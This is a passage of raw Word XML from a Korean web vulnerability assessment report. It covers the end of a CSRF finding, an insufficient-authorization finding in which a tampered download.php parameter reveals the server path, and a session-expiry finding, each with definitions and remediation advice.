          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>자동으로 작성되는 게시글 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00681843" w:rsidRPr="00C97C1E" w:rsidRDefault="00681843" w:rsidP="0068184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6E773FF2" wp14:editId="6FDD0FBC">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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49623" b="48862"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860411" cy="306047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843" w:rsidRPr="00922158" w:rsidRDefault="00681843" w:rsidP="00681843">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="_Toc48909165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3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F0740E" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>CSRF 공격 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00E638FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00E638FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E638FE" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00E638FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00E638FE" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="457" w:name="_Toc48909048"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="457"/>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740E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웹 사이트의 게시판,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자료실,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>등에서 사용자로부터 입력 받는 인수 값에 대해 검증 로직 및 필터링 추가 적용</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740E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t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인수 값이 입력이 되더라도 실행되지 않게 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740E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H</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">TML </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>또는 자바스크립트에 해당되는 태그 사용을 제한</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740E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 xml:space="preserve">- 부득이하게 게시판에 HTML을 사용하는 경우 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코드 중 필요한 코드에 대해서만 입력 가능하도록 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00F0740E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="458" w:name="_Toc48909049"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>불충분한 인가</w:t>
      </w:r>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="459" w:name="_Toc48909050"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00922158" w:rsidRDefault="00177D19" w:rsidP="00177D19">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 중요 정보 페이지 접근을 위한 인증 로직이 구현되지 않을 경우, 비인가 사용자가 특정 페이지에 접근해 중요 정보의 열람 및 변조가 가능한 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="460" w:name="_Toc48909051"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="460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177D19" w:rsidRPr="00C97C1E" w:rsidTr="002F08C6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177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="002F08C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r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b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177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="002F08C6">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>* /</w:t>
            </w:r>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>download.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="002F08C6">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">  - </w:t>
            </w:r>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ps_file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidTr="002F08C6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177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="002F08C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r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>설명</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5781" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D19">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">- 권한 없는 사용자가 </w:t>
            </w:r>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>download.php</w:t>
            </w:r>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">’ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C97C1E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>파일에 접근해 웹 서버의 경로 정보를 확인함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19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177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D1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403E79" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>download.php파일에 파라미터 값을 변조 후 접근함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D1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1EEFDC97" wp14:editId="72EE4726">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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t="5412" r="54044" b="49834"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860823" cy="306073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D19" w:rsidRPr="00922158" w:rsidRDefault="00177D19" w:rsidP="00177D19">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="461" w:name="_Toc48909166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4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403E79" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>파라미터 변조 후 접근</w:t>
      </w:r>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D1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3]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00403E79" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>정상 응답 값으로 웹</w:t>
      </w:r>
      <w:r w:rsidR="00F82A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00403E79" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>서버의 경로를 보여주고 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D1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3A2C6E49" wp14:editId="558FB0EC">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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8" t="15742" r="1552" b="39515"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860295" cy="306040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D19" w:rsidRPr="00922158" w:rsidRDefault="00177D19" w:rsidP="00177D19">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="462" w:name="_Toc48909167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5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403E79" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>웹</w:t>
      </w:r>
      <w:r w:rsidR="00F82A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00403E79" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>서버의 경로 값을 응답</w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00177D19">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="_Toc48909052"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00922158" w:rsidRDefault="00177D19" w:rsidP="00177D19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 xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00403E79" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>중요 정보 페이지에 재한 추가 인증 로직 구현이 필요</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00403E79" w:rsidRPr="00922158" w:rsidRDefault="00403E79" w:rsidP="00177D19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 xml:space="preserve">- 비인가 사용자의 요청에 권한을 넘는 정보가 응답되지 않게 확인 또는 인증 로직 구현 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00177D19" w:rsidRPr="00C97C1E" w:rsidRDefault="00177D19" w:rsidP="00F0740E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00804495" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="464" w:name="_Toc48909053"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">불충분한 세션 </w:t>
      </w:r>
      <w:r w:rsidR="00403E79" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>만료</w:t>
      </w:r>
      <w:bookmarkEnd w:id="464"/>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="465" w:name="_Toc48909054"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740E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="00177D19" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>세션의 만료 기간을 정하지 않거나,</w:t>
      </w:r>
      <w:r w:rsidR="00177D19" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00177D19" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>만료 기한을 너무 길게</w:t>
      </w:r>
      <w:r w:rsidR="00403E79" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 설정된 경우 악의적인 사용자가 만료되지 않는 세션을 활용하여 불법적인 접근이 가능한 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="_Toc48909055"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="466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F0740E" w:rsidRPr="00922158" w:rsidTr="00F0740E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0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740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F0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740E">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="0082110E" w:rsidRPr="00922158">
              <w:t>index.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F0740E" w:rsidRPr="00922158" w:rsidTr="00F0740E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0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740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F0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="0082110E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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="0082110E" w:rsidRPr="00922158">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0082110E" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>시간이 지나도 세션이 만료가 되지 않음</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00F0740E">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00F0740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1E0163" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>로그인 후,</w:t>
      </w:r>
      <w:r w:rsidR="001E0163" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E0163" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>자동 로그 아웃이 될 때까지 기다림</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="0082110E" w:rsidP="00F0740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C2AAA" wp14:editId="19CD856A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4648200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>292100</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="676275" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="28575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857A" id="직사각형 48" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:366pt;margin-top:23pt;width:53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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C9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FC2F" wp14:editId="6E6E9E9E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>561975</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>606425</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="257175" cy="180975"/>
                <wp:effectExtent l="0" t="0" r="28575" b="2857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15148" id="직사각형 47" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:44.25pt;margin-top:47.75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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F0740E" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
